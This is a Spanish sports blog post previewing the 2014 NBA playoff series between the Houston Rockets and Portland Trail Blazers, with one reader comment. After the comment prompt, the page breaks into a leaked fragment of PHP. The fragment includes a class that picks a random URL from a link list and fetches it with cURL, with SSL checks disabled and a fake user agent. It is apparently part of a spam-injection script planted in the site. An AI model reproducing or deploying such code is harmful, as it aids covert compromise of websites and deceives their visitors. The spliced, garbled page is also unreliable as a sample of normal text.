PO 2014: Previa Houston Rockets – Portland Trail Blazers

18 de April de 2014 por Simon

La temporada regular nos deja esta interesantísima primera ronda en el Oeste entre equipos que vienen en claro ascenso y que a buen seguro han llegado para quedarse por varios años en la élite de la conferencia. Sus trayectorias han sido opuestas pero ambos han terminado con un récord casi idéntico y con unas sensaciones muy buenas.

Los Blazers  comenzaron la temporada sorprendiendo a propios y extraños con un 80% de victorias en los dos primeros meses de competición con un Lamarcus Aldridge que por momentos peleó de tú a tú el premio de MVP con Lebron y Durant. A mitad de campaña coincidiendo con problemas físicos del propio Aldridge el equipo pasó por muchas dificultades, e incluso llegamos a pensar en la posibilidad que su caída les llevara a caer fuera de las eliminatorias. Poco a poco, tras recuperar a los jugadores con problemas físicos, el equipo comenzó a carburar de nuevo y han terminado la temporada en una forma excepcional.

Por su parte los Rockets han tenido una temporada más lineal con una tendencia casi siempre ascendente. Comenzaron la temporada a un gran nivel pero un mal mes de Diciembre sembró las primeras dudas sobre el equipo. La no salida de Omer Asik y su posible repercusión negativa en la química del equipo nos tenía a todos con la mosca detrás de la oreja. Pero la verdad es que al equipo parece no haberle aceptado esta situación e incluso hemos visto a Asik jugando a buen nivel cuando Howard causaba baja.

Claves de la eliminatoria:

  • Controlar el rebote: Los Blazers son el mejor equipo de la competición en este apartado pero los Rockets no se quedan atrás y son el 4º clasificado. En los partido de la temporada el que controló el rebote se llevó el partido salvo en un partido que la exhibición de Harden rompió todos los esquemas.
  • Defensa: En dos equipos tan netamente ofensivos (ambos top 5 de la liga) y tan flojos defensivamente (ambos entre los 10 peores equipos de la liga)  la defensa se va a tornar vital en estos Play Off, pues si algún equipo consigue montar una defensa decente tendrá mucho ganado en esta eliminatoria. En este apartado la presencia de Dwight Howard puede ser desequilibrante.
  • Duelo en el clutch: Damian Lillard y James Harden. James Harden y Damian Lillard. Dos jugadores jóvenes aunque nos han dejado ya muchas canastas definitorias y que llevan todo el peso de sus equipos cuando el reloj aprieta. De lo certeros que estén en esos minutos va a depender un buen porcentaje de la eliminatoria.

Pronóstico: 4-3 para Houston con ambos equipos ganando en sus canchas. Con Harden como auténtico protagonista de la serie.

Comenta

Un comentario a esta entrada

  1. Sancho88 dice:
    #1

    Difícil pronóstico porque como bien dices Simon son dos equipos muy parejos, que les gusta jugar al ataque. Se prevee una típica eliminatoria del Oeste a muchos partidos, a muchos puntos, con prórrogas, etc. Creo que Houston es favorito porque Harden llega al final de la temporada con un punto extra con respecto a los demás. Está impresionante el tío. Howard se ha recuperado a tiempo y va a ser muy vibrante su duelo con LaMarcus. Pero da la sensación de que a los Blazers se les ha hecho muy larga la temporada. Una vez más, el tema de la escasa rotación. Mo Williams decepción clara. Alguien va a tener que dar un paso al frente desde la segunda unidad. Parece que Dorrell Wright está bastante bien para ser el líder desde la segunda unidad, y T-Rob y Will Barton tendrán que ayudar. Curioso el tío este, el Barton, es un mini Corey Brewer pero se le ven cosas buenas, debería jugar más no?

    No obstante, Houston es mucho más equipo, más curtido con Howard y Harden con experiencia en Playoffs, y Parsons y Jones increíbles, Beberley que podría ser perfectamente candidato a defensor del año… Yo doy un 4-2 a favor de Rockets. Portland están muy cansados para aguantar una serie muy larga

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>